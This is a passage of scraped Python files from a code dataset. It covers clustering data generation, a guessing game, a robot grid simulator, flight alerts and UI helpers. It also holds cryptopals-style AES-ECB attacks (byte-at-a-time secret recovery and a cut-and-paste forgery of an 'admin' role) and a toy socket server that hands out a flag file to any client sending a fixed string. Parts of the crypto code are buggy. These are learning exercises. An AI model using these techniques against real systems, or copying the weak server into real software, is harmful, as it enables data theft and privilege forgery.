np.dot(x, vec), y\n\n elif self.structure == 'variances':\n\n std = [1.0, 2.5, 0.5]\n return make_blobs(n_samples=self.n_samples, cluster_std=std, random_state=self.randomize)\n\n elif self.structure == 'circles':\n\n return make_circles(n_samples=self.n_samples, factor=0.5, noise=0.05)\n\n elif self.structure == 'moons':\n\n return make_moons(n_samples=self.n_samples, noise=0.05)\n\n elif self.structure == 'random':\n\n return np.random.rand(self.n_samples, 2), None\n\n else:\n\n return make_blobs(n_samples=self.n_samples, 
random_state=self.randomize)\n","sub_path":"tomato_utils.py","file_name":"tomato_utils.py","file_ext":"py","file_size_in_byte":18237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337749923","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/3/5 9:56\n# @Author : zhao.chencheng\n# @Email : 907779487@qq.com\n# @File : game.py\n# @Software: PyCharm Community Edition\nimport random\ndef caishuzi():\n print(\"Please give a range\")\n while 1:\n a = input(\"Minimum: \")\n b = input(\"Maximum: \")\n if a == '' or b =='' :\n print(\"Range values cannot be empty!\")\n else:\n if int(a)>int(b):\n a,b=b,a\n print(\"Range: [%s-%s]\"%(a,b))\n break\n c = random.randint(int(a),int(b))\n print(\"Target value\",c,\"shown to make guessing easier!!!\")\n while 1:\n d = input(\"Enter your guess: \")\n if d == '' or d.isdigit() != True:\n print(\"Input is not a number!\")\n else:\n if int(d) < c:\n print(\"The number %s is less than the target value\"%d)\n elif int(d)>c:\n print(\"The number %s is greater than the target value\"%d)\n elif int(d) == c:\n print(\"**Congratulations, you guessed it!**\")\n break\nif __name__ == '__main__':\n caishuzi()","sub_path":"python_study/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131804609","text":"import re\nfrom collections import namedtuple\n\nfrom World import World\n\n\nclass Robot(object):\n \"\"\"\n Base Robot class containing actions and parameters\n \"\"\"\n\n # compass directions as a class constant tuple, preventing a malicious user from rewriting them\n directions = ('N', 'E', 'S', 'W')\n\n # default possible actions a robot can do. To extend these, pass a custom tuple through the\n # `commands` initializer argument\n base_commands = ('L', 'R', 'F')\n\n def __init__(self, world_size, lost_robots, x=0, y=0, direction='N', commands=None):\n self.x = x\n self.y = y\n self.world_max_x = world_size[0]\n self.world_max_y = world_size[1]\n self.world = World(self.world_max_x, self.world_max_y, x, y)\n self.direction = direction\n self.commands = commands if commands is not None else self.base_commands\n # initialize the first robot move with the default position if no value has been provided\n self.robot_moves = [(0, self.x, self.y, self._direction, '')] # stack-like record of robot moves\n self.lost_robots = lost_robots\n\n @property\n def direction(self):\n return self._direction\n\n @direction.setter\n def direction(self, value):\n if value not in self.directions:\n raise ValueError(\"direction you provided {} is not one of N, E, S, W\".format(value))\n self._direction = value\n\n def turn(self, direction, move_id):\n \"\"\"\n Turn 90 degrees clockwise or anticlockwise and update the robot direction\n :return: update_robot_moves call with the new robot direction\n :param: move_id\n \"\"\"\n\n # get last move from self.robot_moves\n last_move = self.robot_moves[-1]\n current_direction = self.directions.index(last_move[3])\n\n # compute the new direction depending on whether we have a positive or negative index and where in\n # the directions we find ourselves\n\n new_direction = current_direction + direction\n\n if new_direction > 3:\n new_direction = self.directions[0]\n elif new_direction < 0:\n new_direction = self.directions[3]\n else:\n new_direction = self.directions[new_direction]\n\n self.update_robot_moves((move_id, last_move[1], last_move[2], new_direction, ''))\n\n def update_robot_moves(self, coordinates):\n \"\"\"\n Append a new move to the self.robot_moves.
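\n\n Illustrative example (added; entries have the shape (move_id, x, y, direction, status)):\n\n >>> robot = Robot(world_size=(5, 5), lost_robots=[])\n >>> robot.update_robot_moves((1, 0, 1, 'N', ''))\n\n 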
Maybe an overkill\n TODO:: rethink if this is required or bind it to an already existent method\n \"\"\"\n\n return self.robot_moves.append(coordinates)\n\n def is_moved_allowed(self):\n \"\"\"\n Check if the move is within allowed boundaries.\n :return True if move is allowed\n :return False if move will fall out of worlds boundaries\n \"\"\"\n # get last move from self.robot_moves\n idx, last_x, last_y, last_dir, last_status = self.robot_moves[-1]\n\n if ((last_dir == 'N' and last_y < self.world_max_y) or\n (last_dir == 'S' and last_y - 1 >= 0)) or \\\n ((last_dir == 'E' and last_x < self.world_max_x) or\n (last_dir == 'W' and last_x - 1 >= 0)):\n return True\n else:\n return False\n\n def move(self, step, move_id: int):\n \"\"\"\n Move one grid unit in the given direction. Check if the move is allowed before the\n adding it to the robot moves\n :return: update_robot_moves if a move is allowed\n :return: break if robot is lost\n \"\"\"\n idx, last_x, last_y, last_dir, last_status = self.robot_moves[-1]\n\n if self.is_moved_allowed():\n if last_dir == 'N':\n return self.robot_moves.append((move_id, last_x, last_y + 1, last_dir, ''))\n elif last_dir == 'S':\n return self.robot_moves.append((move_id, last_x, last_y - 1, last_dir, ''))\n elif last_dir == 'E':\n return self.robot_moves.append((move_id, last_x + 1, last_y, last_dir, ''))\n else:\n return self.robot_moves.append((move_id, last_x - 1, last_y, last_dir, ''))\n else:\n return self.robot_moves.append((idx, last_x, last_y, last_dir, 'LOST'))\n\n def engage(self, moves):\n \"\"\"\n Main function to move the robot\n :return: latest position after completing the moves in a string with format: \"x y direction\"\n :return: if lost the return string has the format: \"x y direction LOST\"\n \"\"\"\n\n if not isinstance(moves, str):\n raise ValueError(\"robot moves must be of type string\")\n\n if len(moves) > 100:\n raise ValueError(\"robot moves must not exceed 100 steps\")\n\n # make a local copy of moves and make sure we have all letters in uppercase\n moves = moves.upper()\n\n # check if there is anything else than the instructions provided in the moves string\n reg = re.compile('^[L|R|F]+$')\n if reg.match(moves):\n for move in enumerate(moves):\n i, m = move\n if m == 'L':\n self.turn(-1, i + 1)\n elif m == 'R':\n self.turn(1, i + 1)\n else:\n last_move_id, last_move_x, last_move_y, last_move_direction, last_move_status = self.robot_moves[-1]\n if last_move_status != 'LOST':\n self.move(1, i + 1)\n\n # check if another robot has been lost on this move. 
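\n # (added note, an assumption about the intended mechanism): lost_robots is\n # expected to hold keys joined from a robot's final move tuple, e.g. the\n # tuple (3, 1, 0, 'E', 'LOST') would be looked up as the string '310ELOST'.\n # 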
if so return the last position as current\n # for the next move\n elif last_move_status == 'LOST' and \\\n str.join('', [str(x) for x in self.robot_moves[-1]]) in self.lost_robots:\n\n self.robot_moves.append(\n (last_move_id + 1, last_move_x, last_move_y, last_move_direction, 'LOST'))\n else:\n break\n\n # return last position after completing the moves\n last_move_id, last_move_x, last_move_y, last_move_direction, last_move_status = self.robot_moves[-1]\n\n return f\"{last_move_x} {last_move_y} {last_move_direction} {last_move_status}\"\n else:\n raise ValueError(\"a sequence of move actions can only contain {}\".format(self.commands))\n\n def __repr__(self):\n \"\"\"\n class string conversion\n :return: human readable representation of the form\n Robot(x=0, y=0, direction=N, commands=('L', 'R', 'F')) for\n default class creation\n \"\"\"\n return (f'{self.__class__.__name__}('\n f'x={self.x}, y={self.y}, direction={self._direction}, commands={self.commands})')\n","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391769238","text":"from data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\nfrom datetime import datetime, timedelta\n\n\n# This file will need to use the DataManager,FlightSearch, FlightData,\n# NotificationManager classes to achieve the program requirements.\n\ndata_manager = DataManager()\nflight_search = FlightSearch()\nsheet_data = data_manager.get_sheet_data()\nnotification_manager = NotificationManager()\n\nORIGIN_CITY_IATA = \"LON\"\n\nfor row in sheet_data:\n if row['iataCode'] == \"\":\n city = row['city']\n iataCode = flight_search.get_iatacode(city)\n row['iataCode'] = iataCode\n\ndata_manager.response_data = sheet_data\ndata_manager.update_sheet_data()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_today = datetime.now() + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n ORIGIN_CITY_IATA,\n destination[\"iataCode\"],\n from_time=tomorrow,\n to_time=six_month_from_today\n )\n\n if flight.price < destination[\"lowestPrice\"]:\n notification_manager.send_email(\n message=f\"Low price alert! 
Only ${flight.price} to \"\n f\"fly from {flight.origin_city}-{flight.origin_airport} to \"\n f\"{flight.destination_city}-{flight.destination_airport}, \"\n f\"from {flight.out_date} to {flight.return_date}.\"\n )\n","sub_path":"Day39FlightDealFinder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"437675476","text":"# _*_ coding: UTF-8 _*_\nimport os\nimport sys\nimport time\nimport socket\nimport signal\nimport random\n\nsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\ndef Time():\n return time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))\n\ndef server(skt):\n line = skt.recv(1024)\n print(line.decode())\n try:\n if line.decode() == \"isme\\n\":\n skt.send((\"isme right\\n\").encode())\n f = open(\"/root/flag.txt\",\"r\")\n flag = f.read()\n skt.send(str(flag).encode())\n except:\n skt.send((\"you send me a wrong str\").encode())\n\n\nskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\nskt.bind(('0.0.0.0', 1024))\nskt.listen(10)\n\nwhile True:\n clnt, addr = skt.accept()\n \n if(os.fork() == 0):\n clnt.send((\"Accepted connection from %s:%d\\n\" % (addr[0], addr[1])).encode())\n if random.randint(1,2)==1:\n server(clnt)\n os._exit(0)\n else:\n print(\"rand=2\")\n sys.exit(0)\n","sub_path":"Docker191016/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601963046","text":"#!/usr/bin/python3\n\nimport Crypto.Cipher.AES\nimport base64 as b64\nimport random\nimport caty\nfrom string import printable\n\n\ndef main():\n #c12()\n c13()\n\n\ndef encryptProfile(payload):\n p = profile_for(payload)\n # assumption: encrypt under a fresh random key (the original left cipher_bytes undefined)\n cipher_bytes = aes_ecb_encrypt(p.encode('utf-8'), randomKey())\n return cipher_bytes\n\n\ndef c13():\n key = randomKey()\n \n # hacker controls input for profile_for()\n keysize = len(key)\n # generate two sets of blocks:\n # set A: \n # A1 = email=jackeroo@e\n # A2 = adminPPPPPPPPPPP\n # A3 = mail.comxxxxxxxx\n # A4 = xxx&uid=10&role=\n # A5 = \n # where P corresponds to the respective padding \n A1 = \"jackeroo@e\"\n A2 = pkcs7padding(b\"admin\").decode(\"utf-8\")\n A3 = \"\"\n A4 = \"mail.comxxxxxxxx\"\n A5 = \"xxx\"\n \n '''\n email = \"jackeroo@jmp.com\"\n prefix = \"email=\"\n role = \"admin\"\n role += \"a\" * (len(role) % keysize) \n L1 = len(prefix + email)\n P1 = \"b\" * (L1 % keysize)\n '''\n payload = A1 + A2 + A3 + A4 + A5\n print(\">>> payload: \", payload.encode(\"utf-8\")) \n p = profile_for(payload)\n print(\">>> profile: \", p.encode(\"utf-8\"))\n #parse_request_string(p)\n \n cipher_bytes = aes_ecb_encrypt(p.encode('utf-8'), key)\n \n print(\">>> cipher: \", cipher_bytes)\n # hacker can see and modify the cipher_bytes before they are decrypted and parsed\n print(\">>> -----\") \n malicious_bytes = hack(cipher_bytes, keysize=16)\n print(\">>> malicious bytes\", malicious_bytes)\n malicious_msg_bytes = aes_ecb_decrypt(malicious_bytes, key)\n print(\">>> decrypted malicious msg: \", malicious_msg_bytes)\n print(parse_request_string(malicious_msg_bytes.decode('utf-8')))\n\ndef genSetA():\n return None\n \n\ndef hack(cipher_bytes, keysize):\n blocks = []\n for i in range(len(cipher_bytes) // keysize):\n blocks.append(bytes([b for b in cipher_bytes[i*keysize:(i+1)*keysize]]))\n print(\">>> cipher blocks\")\n for b in blocks:\n print(b)\n blocks[-1]=blocks[1]\n blocks[1] = b\"\"\n new_cipher_bytes = b\"\".join(b for b in blocks) \n return new_cipher_bytes\n\n\n
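# --- added note (illustrative, not part of the original solution) ---\n# pkcs7padding(), defined further below, pads up to the next 16-byte boundary, e.g.\n# pkcs7padding(b'YELLOW SUB') == b'YELLOW SUB' + b'\\x06' * 6\n# (inputs whose length is already a multiple of 16 are left unpadded here)\n# ---------------------------------------------------------------------\n\n\ndef 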
c12():\n print(\">>> challenge 12 >>>\")\n oracleKeysize = findKeysize(oracle)\n payload = b\"A\" * oracleKeysize * 5\n oraclesize = len(oracle(b\"\"))\n \n # use a multiple of the keysize as estimated total size \n ciphersize = oraclesize + (oraclesize % oracleKeysize)\n print(\">>> keysize: \", oracleKeysize)\n print(\">>> ciphersize: \", ciphersize)\n message = b\"\"\n if isECBmode(oracle(payload)):\n print(\">>> oracle uses ECB mode >>>\")\n print(\">>> try to crack oracle secret >>>\")\n message = singleByteCrackECB(oracle, oracleKeysize, ciphersize)\n \n print(\">>> message >>>\\n{}\".format(message.decode('utf-8')) )\n\n\ndef getNextByte(oracleKeysize, currentMsg, oracle):\n lengthToUse = (oracleKeysize - (1 + len(currentMsg))) % oracleKeysize\n prefix = b\"A\" * lengthToUse\n crackingLength = lengthToUse + len(currentMsg) + 1\n realCiphertext = oracle(prefix)\n #print(prefix,currentMsg)\n cipher_map = {}\n for c in printable:\n fakeCiphertext = oracle(prefix + currentMsg + c.encode('utf-8'))\n cipher_map.update({fakeCiphertext[:crackingLength]:c.encode('utf-8')}) \n try:\n return cipher_map[realCiphertext[:crackingLength]] \n except:\n # if there is no match, then return '.' byte. No match is probably due to padding.\n return b\".\"\n\n\ndef singleByteCrackECB(oracle, oracleKeysize, ciphersize):\n msg_bytes = []\n currentMessage = b\"\"\n for i in range(ciphersize):\n msg_bytes = getNextByte(oracleKeysize, currentMessage, oracle)\n currentMessage += msg_bytes\n return currentMessage \n #print(b\">>> message >>>\",currentMessage) \n \n \ndef findKeysize(oracle, maxKeysize=32):\n keysize = 0\n payload = b\"\"\n previous_cipher = b\"\"\n for n in range(128):\n current_cipher = oracle(b\"\\x41\"*n)\n if (previous_cipher[:n-1] == current_cipher[:n-1]) and n>2:\n keysize = n-1 \n break\n previous_cipher = current_cipher\n return keysize\n\n\ndef oracle(msg_bytes):\n secret_bytes = b64.b64decode(\"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG\\\n 9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdm\\\n luZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\")\n \n msg_bytes += secret_bytes\n return aes_ecb_encrypt(msg_bytes, b\"very\\nsecret\\nkey!\")\n \n\ndef randModeEncrypt(msg_bytes, key_bytes):\n extended_msg_bytes = pkcs7padding(addBytes(msg_bytes)) \n \n r = random.randint(0,1)\n cipher_bytes = b\"\" \n if r:\n print(\">>> ecb mode\")\n cipher_bytes = aes_ecb_encrypt(extended_msg_bytes, key_bytes)\n else:\n print(\">>> cbc mode\")\n cipher_bytes = aes_cbc_encrypt(extended_msg_bytes, key_bytes, randomKey())\n return cipher_bytes\n \n \ndef addBytes(msg_bytes):\n n = random.randint(5,10)\n extended_msg_bytes = b\"\\x41\"*n + msg_bytes + b\"\\x41\"*n\n return extended_msg_bytes\n\n\ndef randomKey(keysize=16):\n key = [0] * keysize\n for i in range(keysize):\n key[i] = random.randint(0,255)\n return bytes(key)\n\n\ndef aes_ecb_encrypt(msg_bytes, key_bytes):\n aes_ecb = Crypto.Cipher.AES.new(key_bytes,Crypto.Cipher.AES.MODE_ECB)\n return aes_ecb.encrypt(pkcs7padding(msg_bytes))\n #return aes_ecb.encrypt((msg_bytes))\n \n \ndef aes_ecb_decrypt(cipher_bytes, key_bytes):\n aes_ecb = Crypto.Cipher.AES.new(key_bytes, Crypto.Cipher.AES.MODE_ECB)\n msg_bytes = aes_ecb.decrypt(cipher_bytes)\n # begin # remove padding\n print(\">>> remove padding\")\n n = msg_bytes[-1]\n print(\">>> \",n)\n if n <= 15: \n # end # remove padding\n return msg_bytes[:-n]\n else:\n return msg_bytes \n \ndef aes_cbc_decrypt(cipher_bytes,key_bytes=b\"YELLOW 
SUBMARINE\",iv_bytes=b\"\\x00\"*16):\n msg_bytes = []\n blocks = getBlocks(cipher_bytes)\n block_cipher_bytes = iv_bytes\n for block in blocks:\n xcipher_bytes = aes_ecb_decrypt(block, key_bytes)\n block_msg_bytes = caty.XOR(xcipher_bytes,block_cipher_bytes)\n msg_bytes.append(block_msg_bytes)\n block_cipher_bytes = block\n # begin # remove padding\n print(\">>> remove padding\")\n print(\">>> \", int(msg_bytes[-1],16))\n if int(msg_bytes[-1],16) <= 15:\n for i in range(int(msg_bytes[-1],16)):\n msg_bytes.pop() \n \n # end # remove padding\n return msg_bytes\n\n\ndef aes_cbc_encrypt(msg_bytes,key_bytes=b\"YELLOW SUBMARINE\",iv_bytes=b\"\\x00\"*16):\n padded_msg_bytes = msg_bytes #pkcs7padding(msg_bytes)\n #print(\">>\",padded_msg_bytes)\n cipher_bytes = []\n blocks = getBlocks(padded_msg_bytes)\n block_cipher_bytes = iv_bytes\n for block in blocks:\n # xor block with iv (or previous encrypted block) \n # encrypt xor'd block\n # use this xor'd block as iv for next cbc encryption \n xmsg_bytes = caty.XOR(block,block_cipher_bytes)\n block_cipher_bytes = aes_ecb_encrypt(xmsg_bytes, key_bytes)\n cipher_bytes.append(block_cipher_bytes)\n return cipher_bytes\n\n\ndef pkcs7padding(cipher_bytes,keysize=16):\n r = (keysize - (len(cipher_bytes) % keysize)) % keysize\n #print(r) \n padding = [r]*r\n paddedBytes = cipher_bytes + bytes(padding) \n return paddedBytes\n\n\ndef readCiphersFromFile(filename):\n ciphers = [] \n with open(filename, 'r') as cin:\n line = cin.readline()\n while line != \"\":\n ciphers.append(bytes.fromhex(line.rstrip()))\n line = cin.readline() \n return ciphers\n\n\ndef isECBmode(cipher_bytes,keysize=16):\n isECB = False\n cipherLength = len(cipher_bytes)\n blocks = getBlocks(cipher_bytes,keysize)\n if countRepetitiveBlocks(blocks) > 1:\n isECB = True \n return isECB\n\n\ndef countRepetitiveBlocks(blocks):\n maxCount = 0 \n for block in blocks:\n if blocks.count(block) > maxCount:\n maxCount = blocks.count(block)\n #print(blocks.count(block), maxCount)\n return maxCount\n\n\ndef getBlocks(cipher_bytes, keysize=16):\n blocks = [] \n cipherLength = len(cipher_bytes)\n nblocks = cipherLength // keysize \n \n for i in range(nblocks):\n blocks.append(cipher_bytes[i*keysize:(i+1)*keysize])\n #print(blocks)\n return blocks\n\n\ndef profile_for(adress):\n adress = adress.replace('&','').replace('=','')\n profile = \"email={email}&uid={uid}&role=user\".format(uid=10,email=adress)\n #print(\">>> profile >>>\\n\",profile)\n parse_request_string(profile) \n return profile\n\n\ndef parse_request_string(request_string):\n parameters = request_string.split('&')\n result = \"{\\n\" \n for p in parameters:\n pair = p.split('=')\n result += pair[0] + ': \\'' + pair[1] + '\\',\\n'\n result += \"}\\n\"\n #print(\">>> parsed string >>>\\n\",result)\n return result\n \nif __name__ == \"__main__\":\n main()","sub_path":"aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473238045","text":"from django.conf import settings\nfrom mediagenerator.generators.bundles.base import Filter\nfrom mediagenerator.utils import media_url\nimport logging\nimport re\n\nurl_re = re.compile(r'url\\s*\\([\"\\']?([\\w\\.][^:]*?)[\"\\']?\\)', re.UNICODE)\n\nREWRITE_CSS_MEDIA_URLS = getattr(settings, 'REWRITE_CSS_MEDIA_URLS', True)\n\nclass CSSURL(Filter):\n def __init__(self, **kwargs):\n super(CSSURL, self).__init__(**kwargs)\n assert self.filetype == 'css', (\n 'CSSURL only supports CSS output. 
'\n 'The parent filter expects \"%s\".' % self.filetype)\n\n def get_output(self, variation):\n for input in self.get_input(variation):\n yield self.rewrite_urls(input)\n\n def get_dev_output(self, name, variation):\n content = super(CSSURL, self).get_dev_output(name, variation)\n return self.rewrite_urls(content)\n\n def rewrite_urls(self, content):\n if not REWRITE_CSS_MEDIA_URLS:\n return content\n return url_re.sub(self.fixurls, content)\n\n def fixurls(self, match):\n url = match.group(1)\n if ':' not in url and not url.startswith('/'):\n try:\n url = media_url(url)\n except:\n logging.error('URL not found: %s' % url)\n return 'url(%s)' % url\n","sub_path":"mediagenerator/filters/cssurl.py","file_name":"cssurl.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"581191969","text":"#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Create a 'live update' Tkinter user interface for a specified UI\n# object.\n#\n# Symbols defined: ui_live\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n\nimport tk\n\nfrom ui_panel import panel, show_help\nfrom constants import screen_dy, scrollbar_dx\nfrom enthought.traits.ui.undo import UndoHistory\n\n#-------------------------------------------------------------------------------\n# Creates a 'live update' Tkinter user interface for a specified UI object:\n#-------------------------------------------------------------------------------\n\ndef ui_live ( ui, parent ):\n ui.control = LiveWindow( ui, parent )\n try:\n ui.prepare_ui()\n except:\n ui.control.Destroy()\n ui.control.ui = None\n ui.control = None\n ui.result = False\n raise\n ui.handler.position( ui.info )\n ui.control.Show()\n \n#-------------------------------------------------------------------------------\n# 'LiveWindow' class:\n#-------------------------------------------------------------------------------\n \nclass LiveWindow ( wx.Dialog ):\n \n #---------------------------------------------------------------------------\n # Initializes the object:\n #---------------------------------------------------------------------------\n \n def __init__ ( self, ui, parent ):\n wx.Dialog.__init__( self, parent, -1, ui.view.title )\n wx.EVT_CLOSE( self, self._on_close_page )\n wx.EVT_CHAR( self, self._on_key )\n \n history = None\n self.ui = ui\n view = ui.view\n if view.undo or view.revert or view.ok:\n ui.history = history = UndoHistory()\n \n # Create the actual trait sheet panel and imbed it in a scrollable \n # window:\n sizer = wx.BoxSizer( wx.VERTICAL )\n sw = wx.ScrolledWindow( self )\n trait_sheet = panel( ui, sw )\n sizer.Add( trait_sheet, 1, wx.EXPAND | wx.ALL, 4 )\n tsdx, tsdy = trait_sheet.GetSizeTuple()\n tsdx += 8\n tsdy += 8\n \n max_dy = (2 * screen_dy) / 3\n sw.SetAutoLayout( True 
)\n sw.SetSizer( sizer )\n sw.SetSize( wx.Size( tsdx + ((tsdy > max_dy) * scrollbar_dx), \n min( tsdy, max_dy ) ) )\n sw.SetScrollRate( 16, 16 )\n \n sw_sizer = wx.BoxSizer( wx.VERTICAL )\n sw_sizer.Add( sw, 1, wx.EXPAND )\n \n # Check to see if we need to add any of the special function buttons:\n if (history is not None) or view.help:\n sw_sizer.Add( wx.StaticLine( self, -1 ), 0, wx.EXPAND )\n b_sizer = wx.BoxSizer( wx.HORIZONTAL )\n if view.undo:\n self.undo = self._add_button( 'Undo', self._on_undo, b_sizer, \n False )\n self.redo = self._add_button( 'Redo', self._on_redo, b_sizer, \n False )\n history.on_trait_change( self._on_undoable, 'undoable',\n dispatch = 'ui' )\n history.on_trait_change( self._on_redoable, 'redoable',\n dispatch = 'ui' )\n if view.revert:\n self.revert = self._add_button( 'Revert', self._on_revert, \n b_sizer, False )\n history.on_trait_change( self._on_revertable, 'undoable',\n dispatch = 'ui' )\n if view.ok:\n self._add_button( 'OK', self._on_close_page, b_sizer )\n self._add_button( 'Cancel', self._on_cancel, b_sizer )\n if view.help:\n self._add_button( 'Help', self._on_help, b_sizer )\n sw_sizer.Add( b_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )\n \n # Lay all of the dialog contents out: \n sw_sizer.Fit( self )\n self.SetSizer( sw_sizer )\n self.SetAutoLayout( True )\n\n #---------------------------------------------------------------------------\n # Closes the window (if allowed by the handler):\n #---------------------------------------------------------------------------\n \n def _on_close_page ( self, event = None ):\n \"\"\" Closes the window (if allowed by the handler).\n \"\"\"\n if self.ui.handler.close( self.ui.info, True ):\n self._close_page()\n\n #---------------------------------------------------------------------------\n # Closes the dialog window:\n #---------------------------------------------------------------------------\n \n def _close_page ( self ): \n \"\"\" Closes the dialog window.\n \"\"\"\n self.ui.control = None\n self.ui.result = True\n self.ui = None\n self.Destroy()\n \n #---------------------------------------------------------------------------\n # Handles the user hitting the 'Esc'ape key:\n #---------------------------------------------------------------------------\n \n def _on_key ( self, event ):\n \"\"\" Handles the user hitting the 'Esc'ape key.\n \"\"\"\n if event.GetKeyCode() == 0x1B:\n self._on_close_page( event )\n \n #---------------------------------------------------------------------------\n # Handles an 'Undo' change request:\n #---------------------------------------------------------------------------\n \n def _on_undo ( self, event ):\n \"\"\" Handles an 'Undo' change request.\n \"\"\"\n self.ui.history.undo()\n \n #---------------------------------------------------------------------------\n # Handles a 'Redo' change request:\n #---------------------------------------------------------------------------\n \n def _on_redo ( self, event ):\n \"\"\" Handles a 'Redo' change request.\n \"\"\"\n self.ui.history.redo()\n \n #---------------------------------------------------------------------------\n # Handles a 'Revert' all changes request:\n #---------------------------------------------------------------------------\n \n def _on_revert ( self, event ):\n \"\"\" Handles a 'Revert' all changes request.\n \"\"\"\n self.ui.history.revert()\n \n #---------------------------------------------------------------------------\n # Handles a 'Cancel' all changes request:\n 
#---------------------------------------------------------------------------\n \n def _on_cancel ( self, event ):\n \"\"\" Handles a 'Cancel' all changes request.\n \"\"\"\n if self.ui.handler.close( self.ui.info, True ):\n self._on_revert( event )\n self._close_page()\n \n #---------------------------------------------------------------------------\n # Handles the 'Help' button being clicked:\n #---------------------------------------------------------------------------\n \n def _on_help ( self, event ):\n \"\"\" Handles the 'Help' button being clicked.\n \"\"\"\n show_help( self.ui, event.GetEventObject() )\n \n #---------------------------------------------------------------------------\n # Handles the undo history 'undoable' state changing:\n #---------------------------------------------------------------------------\n \n def _on_undoable ( self, state ):\n \"\"\" Handles the undo history 'undoable' state changing.\n \"\"\"\n self.undo.Enable( state )\n \n #---------------------------------------------------------------------------\n # Handles the undo history 'redoable' state changing:\n #---------------------------------------------------------------------------\n \n def _on_redoable ( self, state ):\n \"\"\" Handles the undo history 'redoable' state changing.\n \"\"\"\n self.redo.Enable( state )\n \n #---------------------------------------------------------------------------\n # Handles the 'revert' state changing:\n #---------------------------------------------------------------------------\n \n def _on_revertable ( self, state ):\n \"\"\" Handles the 'revert' state changing.\n \"\"\"\n self.revert.Enable( state )\n\n #---------------------------------------------------------------------------\n # Creates a new dialog button:\n #---------------------------------------------------------------------------\n\n def _add_button ( self, label, action, sizer, enabled = True ):\n \"\"\" Creates a new dialog button.\n \"\"\"\n button = wx.Button( self, -1, label )\n wx.EVT_BUTTON( self, button.GetId(), action )\n sizer.Add( button, 0, wx.LEFT, 5 )\n button.Enable( enabled )\n return button\n \n","sub_path":"lib/enthought/traits/ui/tk/ui_nonmodal.py","file_name":"ui_nonmodal.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540342406","text":"from io import BytesIO\n\nimport streamlit as st\nfrom arc.arc import Index\nfrom arc.viz import plot\nfrom matplotlib import pyplot\nfrom matplotlib.figure import Figure\n\n\ndef cached_plot(\n plot_idx: Index, attribute: str | None = None, cache: bool = True\n) -> BytesIO:\n full_idx = (plot_idx, attribute)\n _arc = st.session_state.arc\n plot_cache = st.session_state.plot_cache\n if full_idx in plot_cache:\n return plot_cache[full_idx]\n\n image_buffer = BytesIO()\n if attribute is not None:\n fig: Figure = plot(getattr(_arc[plot_idx], attribute))\n else:\n fig: Figure = plot(_arc[plot_idx])\n fig.savefig(image_buffer, format=\"png\")\n pyplot.close(fig)\n if cache:\n plot_cache[full_idx] = image_buffer\n return image_buffer\n","sub_path":"arc/app/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426682974","text":"#!/usr/bin/python3\n\nimport requests, json\n\nURL = 'http://127.0.0.1:5000/usuarios/'\n\nnome = input('Digite o nome: ')\nemail = input('Digite o e-mail: ')\n\nusuario = 
json.dumps({'nome':nome,'email':email})\nheader = {'Content-Type':'application/json'}\n\nrequest = requests.post(URL, data=usuario, headers=header)\n\nif request.status_code == 200:\n print(request.json())\nelse:\n print('Problems with the request')\n","sub_path":"api/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208097603","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/anaconda3/lib/python3.6/site-packages/vnlp/nn/functional.py\n# Compiled at: 2018-06-21 18:29:18\n# Size of source mod 2**32: 1220 bytes\nimport torch, numpy as np\n\ndef pad(seqs, pad_value=0, device=None):\n \"\"\"\n pads a list of variable-length lists and returns a padded tensor and a lengths tensor.\n \"\"\"\n lens = [len(s) for s in seqs]\n max_len = max(lens)\n return (torch.tensor([s + [pad_value] * (max_len - l) for s, l in zip(seqs, lens)], device=device), torch.tensor(lens, device=device))\n\n\ndef mask(lens, 